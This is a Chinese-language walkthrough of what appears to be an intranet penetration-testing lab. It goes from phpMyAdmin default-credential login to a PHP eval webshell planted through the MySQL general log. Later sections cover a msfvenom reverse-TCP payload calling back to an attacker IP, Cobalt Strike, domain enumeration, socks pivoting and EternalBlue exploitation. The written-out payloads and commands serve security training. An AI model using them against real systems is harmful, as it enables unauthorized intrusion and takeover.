网络配置
Kali网络配置:
Win7网络配置:
Win2003和Win2008网络配置:
信息收集过程
先用kali扫描同网段IP,获取目标机的ip
获取目标主机ip之后,扫描端口号,探测目标开启的服务
可以看到开放了80端口,http服务,尝试访问web服务
信息收集之目录扫描,使用御剑工具扫描目录
发现使用的是phpmyadmin进行php管理,访问后台页面
phpmyadmin后台默认登陆账号密码为root/root,尝试登陆后台
登陆成功
漏洞发现过程
Phpmyadmin后台可以进行sql语句的执行操作,思路尝试利用sql语句写入一句话木马
先查看网站的路径信息,select @@basedir;
说明这个就是用phpstduy搭建的一个web应用。
网站路径为/phpStudy/WWW
然后查看当前用户的写权限 show variables like “secure_file_priv”;
发现对应的值为空,不允许导入和导出操作
换个思路,尝试将木马写入日志文件中,先查看mysql的日志文件配置
show variables like “%log%”;
第一个配置是代表是否开启了日志功能,第二个日志文件的存放位置
所以,可以将第一个配置更改为”On”,第二个配置的文件目录改为一个php文件,用来解析我们的一句话木马
1 | Set global general_log=”on”; |
1 | Set global general_log_file=”C:/phpStudy/WWW/shell.php”; |
查看一下更改结果
1 | show variables like “%log%”; |
写入一句话木马,因为不允许写操作,所以会产生报错信息
但是根据我们的修改,保存信息会存放在日志信息中,并且当作php解析,完成了木马的写入
1 | Select ‘<?php eval($_POST[attack]);?>’; |
木马写入成功后,访问文件,然后使用蚁剑链接
在phpmyadmin界面可以看到一个xycms的数据库,猜测可能存在一个xycms的网站
尝试访问该web应用
站内进行信息收集过程,可以看在公告信息处看到默认的后台地址与账号密码
尝试登陆后台
在后台搜寻漏洞点,在前台模块板块找到文件上传点,尝试写入一句话木马
文件上传成功,但是这个文件路径未知,需要寻找文件的保存路径
之前用御剑扫描得到过一个备份文件
我们可以根据备份文件确定目录结构
查看文件目录结构
这个目录就是刚才上传木马的地方
访问文件之后,使用蚁剑链接
使用CS上线目标靶机
启动服务端
启动客户端
在cs中添加监听器
生成CS木马程序
通过蚁剑上传木马程序
上线主机
渗透阶段
利用msf反弹shell,建立与攻击机的链接
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.18.1.129 LPORT=1235 -f exe >shell.exe |
通过蚁剑,将木马放到目标主机上
Kali利用msf开启监听端口(use exploit/multi/handler)
设置好对应参数,直接run
发现链接不上,重新设置payload
设置新的payload(set payload windows/meterpreter/reverse_tcp)
Run一下就能连上了
chcp 65001解决乱码
查看目标主机网卡信息,获取内网ip:192.168.52.143
靶机信息收集
查看域内所有用户列表
1 | net group /domain |
查看域成员计算机列表
1 | net group “domain computers” /domain |
查看域管理员用户
1 | net group “domain admins” /domain |
查看防火墙信息
1 | netsh firewall show state |
提权到system
域内横向渗透
用msf直接搭建sock隧道
设置路由信息
1 | run post/multi/manage/autoroute |
查看路由
1 | run autoroute -p |
退到上层,使用socks4a进行代理
配置proxychains,保持和socks4a一致
配置成功,界面如下
内网信息收集
切换session,进入之前的session
先利用msf得到的shell,观察内网存活主机个数
一台存活主机为192.168.52.138,另一台存活主机为192.168.52.141
对两台主机进行扫描,使用一些常见漏洞端口
发现主机192.168.52.138开启了445端口,可能存在永恒之蓝漏洞
然后测试192.168.52.141,同样开放了445端口
漏洞利用
确定是否存在永恒之蓝漏洞
发现都存在永恒之蓝漏洞
尝试攻击执行rce
192.168.52.138执行whoami
192.168.52.141执行whoami
存在的问题及解决办法
msf生成的payload需要设为为32位,否则链接不稳定,没有办法getsystem
msf使用监听模块时,也需要将监听模块的payload设置和木马生成payload一致,否则会连接不上